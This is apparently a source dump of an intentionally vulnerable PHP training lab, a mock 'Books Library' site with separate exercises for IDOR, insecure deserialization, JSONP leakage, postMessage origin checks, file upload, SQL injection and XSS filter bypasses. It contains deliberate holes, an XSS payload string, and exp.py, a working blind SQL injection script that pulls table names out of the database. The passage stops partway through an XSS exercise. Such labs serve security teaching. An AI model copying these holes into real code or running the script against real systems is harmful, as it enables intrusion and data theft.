/labs/idor/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 | 	header("Location: login.php");
 6 | 	die();
 7 | }
 8 | 
 9 | $conn = mysqli_connect('localhost', 'root', '', 'test');
10 | 
11 | $csrfToken = md5("SECRET");
12 | 
13 | if( isset($_POST['userId']) && isset($_POST['comment']) ){
14 | 	$uname = htmlentities($_SESSION['username']);
15 | 	if($_COOKIE['uid'] == "c4ca4238a0b923820dcc509a6f75849b"){
16 | 		$uname = "Admin";
17 | 	}
18 |     $comment = htmlentities($_POST['comment']);
19 |     $link = "#";
20 |     $sql = "INSERT INTO comments values('$uname','$comment','$link')";
21 |     $res = mysqli_query($conn, $sql);
22 | }
23 | 
24 | $sql = "SELECT * FROM comments";
25 | 
26 | $result = mysqli_query($conn, $sql);
27 | 
28 | ?>
29 | <html>
30 |   <head>
31 |     <title>Books Library</title>
32 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
33 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
34 |   </head>
35 |   <body id="bodyId">
36 |     <div class="header">
37 |       <a href="index.php" class="logo">Books Library</a>
38 |       <div class="header-right">
39 |         <a href="index.php">Home</a>
40 |         <a class="active" href="profile.php">Profile</a>
41 |         <a href="login.php">Login</a>
42 |       </div>
43 |     </div>
44 |     <div class="container">
45 |     <div class="be-comment-block">
46 |         <div class="be-comment">
47 |         <?php
48 | 			while($rows=mysqli_fetch_array($result)){
49 | 			    echo '<span class="be-comment-name">';
50 | 			    echo '<a href="'.$rows['link'].'">'.$rows['uname'].'</a></span>';
51 | 			    echo '<p class="be-comment-text">'.$rows['comment'].'</p>';
52 | 			    echo '</div>';
53 | 			}
54 |         ?>
55 |         </div>
56 |         <form class="form-block" method="post">
57 |             <div class="row">
58 |                 <div class="col-xs-12">                         
59 |                     <div class="form-group">
60 |                         <textarea name="comment" class="form-input" required="" placeholder="Your text"></textarea><br>
61 |                         <input type="hidden" name="csrfToken" value="<?php echo $csrfToken;?>">
62 |                         <input type="hidden" name="userId" value="51324">
63 |                     </div>
64 |                 </div>
65 |                 <input style="width: 100px;" type="submit" value="Comment">
66 |             </div>
67 |         </form>
68 |     </div>
69 |     </div>
70 |   </body>
71 | </html>


--------------------------------------------------------------------------------
/labs/insecuredes/backup.bak:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | // updated
 4 | class User{
 5 | 	
 6 | 	public $u;
 7 | 	public $r;
 8 | 	public $dn;
 9 | 
10 | }
11 | 
12 | // still in use
13 | class getDate{
14 | 	public $command2GetDate;
15 | 
16 | 	function __construct($d){
17 | 		$this->command2GetDate = $d;
18 | 	}
19 | 
20 | 	function __wakeup(){
21 | 		system($this->command2GetDate);
22 | 	}
23 | }
24 | 
25 | 


--------------------------------------------------------------------------------
/labs/insecuredes/classes.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class User{
 4 | 	
 5 | 	public $u;
 6 | 	public $r;
 7 | 	public $dn;
 8 | 
 9 | }
10 | 
11 | class getDate{
12 | 	public $command2GetDate;
13 | 
14 | 	function __construct($d){
15 | 		$this->command2GetDate = $d;
16 | 	}
17 | 
18 | 	function __wakeup(){
19 | 		system($this->command2GetDate);
20 | 	}
21 | }
22 | 
23 | ?>


--------------------------------------------------------------------------------
/labs/insecuredes/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 5 |   </head>
 6 |   <body id="bodyId">
 7 |     <div class="header">
 8 |       <a href="index.php" class="logo">Books Library</a>
 9 |       <div class="header-right">
10 |         <a class="active" href="index.php">Home</a>
11 |         <a href="profile.php">Profile</a>
12 |         <a href="login.php">Login</a>
13 |       </div>
14 |     </div>
15 |     <div>
16 |         <center>
17 |             <br><br><br><h3 id="type"></h3>
18 |         </center>
19 |     </div>
20 |     <script type="text/javascript">
21 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
22 |             i=0,
23 |             body=document.getElementById('bodyId');
24 |         body.onload = function(){
25 |             'use strict';
26 |             var typeWriter = setInterval(function(){
27 | 
28 |                 document.getElementById('type').innerHTML += msg[i];
29 |                 i = i + 1;
30 | 
31 |                 if(i>msg.length-1){
32 |                     clearInterval(typeWriter)
33 |                 }
34 |             }, 100);
35 |         }
36 |     </script>
37 |   </body>
38 | </html>


--------------------------------------------------------------------------------
/labs/insecuredes/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | include 'classes.php';
 4 | 
 5 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 6 | 	if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest123") {
 7 | 
 8 | 		$_SESSION['islogin'] = 1;
 9 | 
10 | 		$userObj = new User();
11 |     $userObj->u = $_POST['uname'];
12 |     $userObj->r = "guest";
13 |     $userObj->dn = "Guest User";
14 | 
15 | 		setcookie("sessionid",base64_encode(serialize($userObj)),time()+3600);
16 | 
17 | 		header("Location: profile.php");
18 | 
19 | 	}else{
20 | 		echo "<script>alert('Username/Password is invalid.')</script>";
21 | 	}
22 | }
23 | ?>
24 | <html>
25 |   <head>
26 |     <title>Books Library</title>
27 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
28 |   </head>
29 |   <body id="bodyId">
30 |     <div class="header">
31 |       <a href="index.php" class="logo">Books Library</a>
32 |       <div class="header-right">
33 |         <a href="index.php">Home</a>
34 |         <a href="profile.php">Profile</a>
35 |         <a class="active" href="login.php">Login</a>
36 |       </div>
37 |     </div>
38 |     <div><br><br>
39 |     	<center>
40 |     	<form method="POST">
41 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
42 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
43 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
44 |     	</form>
45 |     	</center>
46 |     </div>
47 |   </body>
48 | </html>


--------------------------------------------------------------------------------
/labs/insecuredes/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | include 'classes.php';
 4 | if($_SESSION['islogin'] != 1){
 5 |     header("Location: login.php");
 6 |     die();
 7 | }
 8 | 
 9 | $sessionid = $_COOKIE['sessionid'];
10 | $deser = unserialize(base64_decode($sessionid));
11 | 
12 | $role = $deser->r;
13 | $uname = $deser->u;
14 | $dn = $deser->dn;
15 | 
16 | if($role == 'admin'){
17 |     $dn = "Admin";
18 | }
19 | 
20 | ?>
21 | 
22 | <html>
23 |   <head>
24 |     <title>Books Library</title>
25 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
26 |   </head>
27 |   <body id="bodyId">
28 |     <div class="header">
29 |       <a href="index.php" class="logo">Books Library</a>
30 |       <div class="header-right">
31 |         <a href="index.php">Home</a>
32 |         <a class="active" href="profile.php">Profile</a>
33 |         <a href="login.php">Login</a>
34 |       </div>
35 |     </div>
36 |     <center>
37 |         <h3>Welcome <?php echo $dn;?>.</h3>
38 |     </center>
39 |     <div class="container">
40 |     <div class="be-comment-block">
41 |     </div>
42 |     </div>
43 |   </body>
44 | </html>


--------------------------------------------------------------------------------
/labs/jsonp/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 5 |   </head>
 6 |   <body id="bodyId">
 7 |     <div class="header">
 8 |       <a href="index.php" class="logo">Books Library</a>
 9 |       <div class="header-right">
10 |         <a class="active" href="index.php">Home</a>
11 |         <a href="profile.php">Profile</a>
12 |         <a href="login.php">Login</a>
13 |       </div>
14 |     </div>
15 |     <div>
16 |         <center>
17 |             <br><br><br><h3 id="type"></h3>
18 |         </center>
19 |     </div>
20 |     <script type="text/javascript">
21 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
22 |             i=0,
23 |             body=document.getElementById('bodyId');
24 |         body.onload = function(){
25 |             'use strict';
26 |             var typeWriter = setInterval(function(){
27 | 
28 |                 document.getElementById('type').innerHTML += msg[i];
29 |                 i = i + 1;
30 | 
31 |                 if(i>msg.length-1){
32 |                     clearInterval(typeWriter)
33 |                 }
34 |             }, 100);
35 |         }
36 |     </script>
37 |   </body>
38 | </html>


--------------------------------------------------------------------------------
/labs/jsonp/info.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 | header("Content-Type: application/json");
4 | if(isset($_GET['callback'])){
5 | 	echo $_GET['callback'].'({"username":"guest","Full Name":"Guest user", "email":"guest@gmail.com","privateGroups":["priv","private","our course","Work Group"]})';
6 | }else{
7 | 	echo '{"username":"guest","Full Name":"Guest user", "email":"guest@gmail.com","privateGroups":["priv","private","our course","Work Group"]}';
8 | }


--------------------------------------------------------------------------------
/labs/jsonp/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 5 |   if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest123") {
 6 |     $_SESSION['islogin'] = 1;
 7 |     $_SESSION['username'] = $_POST['uname'];
 8 |     header("Location: profile.php");
 9 |   }else{
10 |     echo "<script>alert('Username/Password is invalid.')</script>";
11 |   }
12 | }
13 | 
14 | 
15 | ?>
16 | <html>
17 |   <head>
18 |     <title>Books Library</title>
19 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
20 |   </head>
21 |   <body id="bodyId">
22 |     <div class="header">
23 |       <a href="index.php" class="logo">Books Library</a>
24 |       <div class="header-right">
25 |         <a href="index.php">Home</a>
26 |         <a href="profile.php">Profile</a>
27 |         <a class="active" href="login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     <div><br><br>
31 |       <center>
32 |       <form method="POST">
33 |         <input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
34 |         <input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
35 |         <input type="submit" value="Login" style="background-color: dodgerblue;">
36 |       </form>
37 |       </center>
38 |     </div>
39 |   </body>
40 | </html>


--------------------------------------------------------------------------------
/labs/jsonp/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 |     header("Location: login.php");
 6 |     die();
 7 | }
 8 | 
 9 | ?>
10 | <html>
11 |   <head>
12 |     <title>Books Library</title>
13 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
14 |   </head>
15 |   <body id="bodyId">
16 |     <div class="header">
17 |       <a href="index.php" class="logo">Books Library</a>
18 |       <div class="header-right">
19 |         <a href="index.php">Home</a>
20 |         <a class="active" href="profile.php">Profile</a>
21 |         <a href="login.php">Login</a>
22 |       </div>
23 |     </div>
24 |     <div id=output>
25 |     	
26 |     </div>
27 |     <div class="container">
28 |     	<script type="text/javascript">
29 |     		function userInfo(data){
30 |     			var name = '<center><span>User Name: '+data["username"]+'</span><br>',
31 |     				email = '<span>Email: '+data['email']+'</span><br>',
32 |     				fname = '<span>Full Name: '+data['Full Name']+'</span></center>';
33 |     			document.getElementById('output').innerHTML = name+email+fname;
34 |     		}
35 |     	</script>
36 |     	<script src="http://vuln.labs/labs/jsonp/info.php?callback=userInfo"></script>
37 |     </div>
38 |   </body>
39 | </html>


--------------------------------------------------------------------------------
/labs/postmessage/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |       </div>
13 |     </div>
14 |     <div>
15 |         <center>
16 |             <br><br><br><h3 id="type"></h3>
17 |         </center>
18 |     </div>
19 |     <script type="text/javascript">
20 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
21 |             i=0,
22 |             body=document.getElementById('bodyId');
23 |         body.onload = function(){
24 | 			document.getElementById('type').innerHTML += msg
25 |         }
26 | 
27 | 		window.addEventListener("message", displayMessage)
28 | 		function displayMessage(message){
29 | 			if(/http:\/\/trusteddomain.vuln.labs/.test(message.origin)){
30 | 				var recv = "User said: " + message.data;
31 | 				document.getElementById("type").innerHTML = recv
32 | 			}
33 | 		}
34 | </script>
35 |     </script>
36 |   </body>
37 | </html>


--------------------------------------------------------------------------------
/labs/setup.txt:
--------------------------------------------------------------------------------
1 | Create Database called test;
2 | Create Table called comments (uname, comment, link) # Add Dummy Values
3 | Create Table called books (name, auther, story) # Add Dummy Values
4 | Create Table called contact (name, email, message, user_agent)
5 | Create Table called users (username, pass) # Add Dummy User guest:guest
6 | Create Table called users_csrf (username, email, password) # Add Dummy User guest:guest


--------------------------------------------------------------------------------
/labs/sql/exp.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | url = 'http://vuln.labs/labs/sql/login.php'
 4 | 
 5 | alpha = "abcdefghijklmnopqrstuvwxyz"
 6 | username = []
 7 | length = 0
 8 | 
 9 | place = 3
10 | 
11 | # get length
12 | for i in range(1, 20):
13 | 	link = url
14 | 	payload = "f' or length((select table_name from information_schema.tables where table_schema=database() limit "+str(place)+",1))="+str(i)+" limit 1,1#"
15 | 	params = {"pwd":"f",'uname':payload}
16 | 	req = requests.post(link, data=params)
17 | 	print(payload)
18 | 	if "Username/Password" not in req.text:
19 | 		length = i
20 | 		break
21 | 
22 | # extract info from database
23 | for i in range(1, length+1):
24 | 	for f in alpha:
25 | 		link = url
26 | 		payload = "f' or ascii(substring((select table_name from information_schema.tables where table_schema=database() limit "+str(place)+",1),"+str(i)+",1))="+str(ord(f))+" limit 1,1#"
27 | 		params = {"pwd":"f",'uname':payload}
28 | 		req = requests.post(link, data=params)
29 | 		
30 | 		if "Username/Password" not in req.text:
31 | 			print("Char: " + f)
32 | 			username.append(f)
33 | 
34 | 


--------------------------------------------------------------------------------
/labs/sql/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |         <a href="search.php">Search</a>
13 |         <a href="profile.php">Profile</a>
14 |         <a href="login.php">Login</a>
15 |       </div>
16 |     </div>
17 |     <div>
18 |         <center>
19 |             <br><br><br><h3 id="type"></h3>
20 |         </center>
21 |     </div>
22 |     <script type="text/javascript">
23 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
24 |             i=0,
25 |             body=document.getElementById('bodyId');
26 |         body.onload = function(){
27 |             'use strict';
28 |             var typeWriter = setInterval(function(){
29 | 
30 |                 document.getElementById('type').innerHTML += msg[i];
31 |                 i = i + 1;
32 | 
33 |                 if(i>msg.length-1){
34 |                     clearInterval(typeWriter)
35 |                 }
36 |             }, 100);
37 |         }
38 |     </script>
39 |   </body>
40 | </html>


--------------------------------------------------------------------------------
/labs/sql/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 | 
 5 | 	$conn = mysqli_connect('localhost','root','','test');
 6 | 	$uname = $_POST['uname'];
 7 | 	$pwd = $_POST['pwd'];
 8 | 
 9 | 	$sql = "SELECT * FROM users WHERE username='$uname' and pass='$pwd';";
10 | 	// echo $sql;
11 | 	$res = @mysqli_query($conn, $sql);
12 | 	$count = @mysqli_num_rows($res);
13 | 	$rows = @mysqli_fetch_array($res);
14 | 	if($count > 0) {
15 | 		$_SESSION['islogin'] = 1;
16 | 		$_SESSION['username'] = $rows['username'];
17 | 		header("Location: profile.php");
18 | 	}else{
19 | 		echo "<script>alert('Username/Password is invalid.')</script>";
20 | 	}
21 | }
22 | ?>
23 | <html>
24 |   <head>
25 |     <title>Books Library</title>
26 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
27 |   </head>
28 |   <body id="bodyId">
29 |     <div class="header">
30 |       <a href="index.php" class="logo">Books Library</a>
31 |       <div class="header-right">
32 |         <a href="index.php">Home</a>
33 |         <a href="search.php">Search</a>
34 |         <a href="profile.php">Profile</a>
35 |         <a class="active" href="login.php">Login</a>
36 |       </div>
37 |     </div>
38 |     <div><br><br>
39 |     	<center>
40 |     	<form method="POST">
41 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
42 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
43 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
44 |     	</form>
45 |     	</center>
46 |     </div>
47 |   </body>
48 | </html>


--------------------------------------------------------------------------------
/labs/sql/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 |     header("Location: login.php");
 6 |     die();
 7 | }
 8 | 
 9 | ?>
10 | 
11 | <html>
12 |   <head>
13 |     <title>Books Library</title>
14 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
15 |   </head>
16 |   <body id="bodyId">
17 |     <div class="header">
18 |       <a href="index.php" class="logo">Books Library</a>
19 |       <div class="header-right">
20 |         <a href="index.php">Home</a>
21 |         <a href="search.php">Search</a>
22 |         <a class="active" href="profile.php">Profile</a>
23 |         <a href="login.php">Login</a>
24 |       </div>
25 |     </div>
26 |     
27 |     <div class="container">
28 |     <div class="be-comment-block">
29 |         <div class="be-comment">
30 |         <?php
31 | 
32 |         echo "<center><h1>Welcome <i>".@$_SESSION['username']."</i></h1></center>";
33 | 
34 |         ?>
35 |         </div>
36 |     </div>
37 |     </div>
38 |   </body>
39 | </html>


--------------------------------------------------------------------------------
/labs/sql/search.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $print = 0;
 3 | if(isset($_POST['name'])){
 4 | 
 5 | 	$conn = mysqli_connect('localhost','root','','test');
 6 | 
 7 | 	$name = $_POST['name'];
 8 | 	$sql = 'SELECT * FROM books where name like "%'.$name.'%"';
 9 | 
10 | 	$res = mysqli_query($conn, $sql);
11 | 	$rows = @mysqli_fetch_array($res);
12 | 	$print = 1;
13 | }
14 | 
15 | ?>
16 | <html>
17 |   <head>
18 |     <title>Books Application</title>
19 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
20 |   </head>
21 |   <body>
22 |     <div class="header">
23 |       <a href="index.php" class="logo">Books Library</a>
24 |       <div class="header-right">
25 |         <a href="index.php">Home</a>
26 |         <a class="active" href="search.php">Search</a>
27 |         <a href="profile.php">Profile</a>
28 |         <a href="login.php">Login</a>
29 |       </div>
30 |     </div><br><br><br><br>
31 |     <center>
32 |         <form method="post">
33 |             <label>Name:</label>
34 |             <input type="text" id="name" name="name" placeholder="Enter a name here" autocomplete="off">
35 |             <input type="submit" id="search" value="search">
36 |         </form>
37 |     <div ng-app>
38 |         <p id="printOut">
39 |         	<?php
40 | if ($print == 1){
41 | 	if($rows){
42 | 		echo "<label>Auther: ".$rows['auther']."</label><br>";
43 | 		echo "<label>Book Name: ".$rows['name']."</label><br>";
44 | 		echo "<label>Story: ".$rows['story']."</label>";
45 | 	}
46 | }
47 | 
48 |         	?>
49 |         </p>
50 |     </div>
51 |     </center>
52 |   </body>
53 | </html>


--------------------------------------------------------------------------------
/labs/style/css.css:
--------------------------------------------------------------------------------
  1 | #name{
  2 |   width: 300px;
  3 |   height: 30px;
  4 |   text-align: center;
  5 |   border-radius: 4px;
  6 | }
  7 | input{border-style: solid;background: #f1f1f1;}
  8 | input[type="submit"]{
  9 |     width: 60px;
 10 |     height: 30px;
 11 | }
 12 | 
 13 | #fname, #email{
 14 |   height: 40px;
 15 |   text-align: center;
 16 | }
 17 | #send{
 18 |   background-color: dodgerblue;
 19 |   height: 40px
 20 | }
 21 | #msg{
 22 |   height: 200px;
 23 |   background: #f1f1f1;
 24 | }
 25 | 
 26 | #pwd,#uname,#fname, #email, #msg, #send{
 27 |   width: 400px;
 28 |   margin: 2px;
 29 |   border-style: solid;
 30 | }
 31 | 
 32 | #search{
 33 |   color: black;
 34 |   text-align: center;
 35 |   text-decoration: none;
 36 |   border-radius: 4px;
 37 | }
 38 | body{background: #f1f1f1;}
 39 | #type{
 40 |   width: 400px;
 41 | }
 42 | 
 43 | /* Style the header with a grey background and some padding */
 44 | .header {
 45 |   overflow: hidden;
 46 |   background-color: #f1f1f1;
 47 |   padding: 20px 10px;
 48 | }
 49 | 
 50 | /* Style the header links */
 51 | .header a {
 52 |   float: left;
 53 |   color: black;
 54 |   text-align: center;
 55 |   padding: 12px;
 56 |   text-decoration: none;
 57 |   font-size: 18px;
 58 |   line-height: 25px;
 59 |   border-radius: 4px;
 60 | }
 61 | 
 62 | /* Style the logo link (notice that we set the same value of line-height and font-size to prevent the header to increase when the font gets bigger */
 63 | .header a.logo {
 64 |   font-size: 25px;
 65 |   font-weight: bold;
 66 | }
 67 | 
 68 | /* Change the background color on mouse-over */
 69 | .header a:hover {
 70 |   background-color: #ddd;
 71 |   color: black;
 72 | }
 73 | 
 74 | /* Style the active/current link*/
 75 | .header a.active {
 76 |   background-color: dodgerblue;
 77 |   color: white;
 78 | }
 79 | 
 80 | /* Float the link section to the right */
 81 | .header-right {
 82 |   float: right;
 83 | }
 84 | 
 85 | /* Add media queries for responsiveness - when the screen is 500px wide or less, stack the links on top of each other */
 86 | @media screen and (max-width: 500px) {
 87 |   .header a {
 88 |     float: none;
 89 |     display: block;
 90 |     text-align: left;
 91 |   }
 92 |   .header-right {
 93 |     float: none;
 94 |   }
 95 | }
 96 | 
 97 | .be-comment-block {
 98 |     margin-bottom: 50px !important;
 99 |     border: 1px solid #edeff2;
100 |     border-radius: 2px;
101 |     padding: 50px 70px;
102 |     border:1px solid #ffffff;
103 | }
104 | 
105 | .comments-title {
106 |     font-size: 16px;
107 |     color: #262626;
108 |     margin-bottom: 15px;
109 |     font-family: 'Conv_helveticaneuecyr-bold';
110 | }
111 | 
112 | .be-img-comment {
113 |     width: 60px;
114 |     height: 60px;
115 |     float: left;
116 |     margin-bottom: 15px;
117 | }
118 | 
119 | .be-ava-comment {
120 |     width: 60px;
121 |     height: 60px;
122 |     border-radius: 50%;
123 | }
124 | 
125 | .be-comment-content {
126 |     margin-left: 80px;
127 | }
128 | 
129 | .be-comment-content span {
130 |     display: inline-block;
131 |     width: 49%;
132 |     margin-bottom: 15px;
133 | }
134 | 
135 | .be-comment-name {
136 |     font-size: 13px;
137 |     font-family: 'Conv_helveticaneuecyr-bold';
138 | }
139 | 
140 | .be-comment-content a {
141 |     color: #383b43;
142 | }
143 | 
144 | .be-comment-content span {
145 |     display: inline-block;
146 |     width: 49%;
147 |     margin-bottom: 15px;
148 | }
149 | 
150 | .be-comment-time {
151 |     text-align: right;
152 | }
153 | 
154 | .be-comment-time {
155 |     font-size: 11px;
156 |     color: #b4b7c1;
157 | }
158 | 
159 | .be-comment-text {
160 |     font-size: 13px;
161 |     line-height: 18px;
162 |     color: #7a8192;
163 |     display: block;
164 |     background: #f6f6f7;
165 |     border: 1px solid #edeff2;
166 |     padding: 15px 20px 20px 20px;
167 | }
168 | 
169 | .form-group.fl_icon .icon {
170 |     position: absolute;
171 |     top: 1px;
172 |     left: 16px;
173 |     width: 48px;
174 |     height: 48px;
175 |     background: #f6f6f7;
176 |     color: #b5b8c2;
177 |     text-align: center;
178 |     line-height: 50px;
179 |     -webkit-border-top-left-radius: 2px;
180 |     -webkit-border-bottom-left-radius: 2px;
181 |     -moz-border-radius-topleft: 2px;
182 |     -moz-border-radius-bottomleft: 2px;
183 |     border-top-left-radius: 2px;
184 |     border-bottom-left-radius: 2px;
185 | }
186 | .form-input{
187 |   border: 1px solid #000;
188 |   border-radius: 3px;
189 | }
190 | .form-group{
191 |   border: 1px solid #edeff2;
192 |   border-radius: 3px;
193 | }
194 | .form-group .form-input {
195 |     font-size: 13px;
196 |     line-height: 50px;
197 |     font-weight: 400;
198 |     color: #000;
199 |     width: 100%;
200 |     height: 50px;
201 |     padding-left: 20px;
202 |     padding-right: 20px;
203 | }
204 | 
205 | .form-group.fl_icon .form-input {
206 |     padding-left: 70px;
207 | }
208 | 
209 | .form-group textarea.form-input {
210 |     height: 150px;
211 | }


--------------------------------------------------------------------------------
/labs/upload/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |         <a href="profile.php">Profile</a>
13 |         <a href="login.php">Login</a>
14 |       </div>
15 |     </div>
16 |     <div>
17 |         <center>
18 |             <br><br><br><h3 id="type"></h3>
19 |         </center>
20 |     </div>
21 |     <script type="text/javascript">
22 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
23 |             i=0,
24 |             body=document.getElementById('bodyId');
25 |         body.onload = function(){
26 |             'use strict';
27 |             var typeWriter = setInterval(function(){
28 | 
29 |                 document.getElementById('type').innerHTML += msg[i];
30 |                 i = i + 1;
31 | 
32 |                 if(i>msg.length-1){
33 |                     clearInterval(typeWriter)
34 |                 }
35 |             }, 100);
36 |         }
37 |     </script>
38 |   </body>
39 | </html>


--------------------------------------------------------------------------------
/labs/upload/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 | 	if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest123") {
 5 | 		$_SESSION['islogin'] = 1;
 6 | 		$_SESSION['username'] = $_POST['uname'];
 7 | 		header("Location: profile.php");
 8 | 	}else{
 9 | 		echo "<script>alert('Username/Password is invalid.')</script>";
10 | 	}
11 | }
12 | ?>
13 | <html>
14 |   <head>
15 |     <title>Books Library</title>
16 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
17 |   </head>
18 |   <body id="bodyId">
19 |     <div class="header">
20 |       <a href="index.php" class="logo">Books Library</a>
21 |       <div class="header-right">
22 |         <a href="index.php">Home</a>
23 |         <a href="profile.php">Profile</a>
24 |         <a class="active" href="login.php">Login</a>
25 |       </div>
26 |     </div>
27 |     <div><br><br>
28 |     	<center>
29 |     	<form method="POST">
30 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
31 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
32 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
33 |     	</form>
34 |     	</center>
35 |     </div>
36 |   </body>
37 | </html>


--------------------------------------------------------------------------------
/labs/upload/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 |     header("Location: login.php");
 6 |     die();
 7 | }
 8 | $msg="";
 9 | if( isset( $_FILES[ 'upload' ] ) ) {
10 | 
11 |     $target_dir  = __DIR__ . "/userfiles/";
12 |     $target_file = basename( $_FILES[ 'upload' ][ 'name' ] );
13 |     $target_ext  = substr( $target_file, strrpos( $target_file, '.' ) + 1);
14 |     $target_path = $target_dir . $target_file;
15 | 
16 |     $blocked = array('php','html','jsp','shtml','exe');
17 | 
18 |     if( in_array($target_ext, $blocked) ){
19 |         
20 |         $msg .= "Not allowd Extension.";
21 | 
22 |     }else{
23 |         if(!file_exists($target_path)){
24 |             if( !move_uploaded_file( $_FILES[ 'upload' ][ 'tmp_name' ], $target_path ) ) {
25 |             // No
26 |                 $msg .= 'Your image was not uploaded.';
27 |             }
28 |             else {
29 |                 // Yes!
30 |                 $msg .= "{$target_file} succesfully uploaded!";
31 |             }
32 |         }else{
33 |             $msg .= "File already exists.";
34 |         }
35 |     }
36 | }
37 | 
38 | ?>
39 | <html>
40 |   <head>
41 |     <title>Books Library</title>
42 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
43 |   </head>
44 |   <body id="bodyId">
45 |     <div class="header">
46 |       <a href="index.php" class="logo">Books Library</a>
47 |       <div class="header-right">
48 |         <a href="index.php">Home</a>
49 |         <a class="active" href="profile.php">Profile</a>
50 |         <a href="login.php">Login</a>
51 |       </div>
52 |     </div>
53 |     <center>
54 |     <div class="container">
55 |         <form class="form-block" method="post" enctype="multipart/form-data">
56 |             <input type="file" name="upload">
57 |             <input type="submit" value="upload">
58 |         </form>
59 |         <pre><?php echo htmlentities($msg);?></pre>
60 |     </div>
61 |     </center>
62 |     </div>
63 |   </body>
64 | </html>


--------------------------------------------------------------------------------
/labs/xss/XSS Fileters&Bypasses/endpoint.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # JSONP endpoint
 4 | header("Content-Type: application/json");
 5 | 
 6 | if(isset($_GET['callback'])){
 7 | 	echo $_GET['callback'].'({"name":"Tester","email":"test@gmail.com"})';
 8 | }else{
 9 | 	echo '{"name":"Tester","email":"test@gmail.com"}';
10 | }


--------------------------------------------------------------------------------
/labs/xss/XSS Fileters&Bypasses/xss1.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # Bypass using Hex / unicode
 4 | echo "\u003Cimg src=x onerror=alert(0)\u003C";
 5 | $input = $_GET['q'];
 6 | 
 7 | function check($val){
 8 | 	$illegal = "<>'\"";
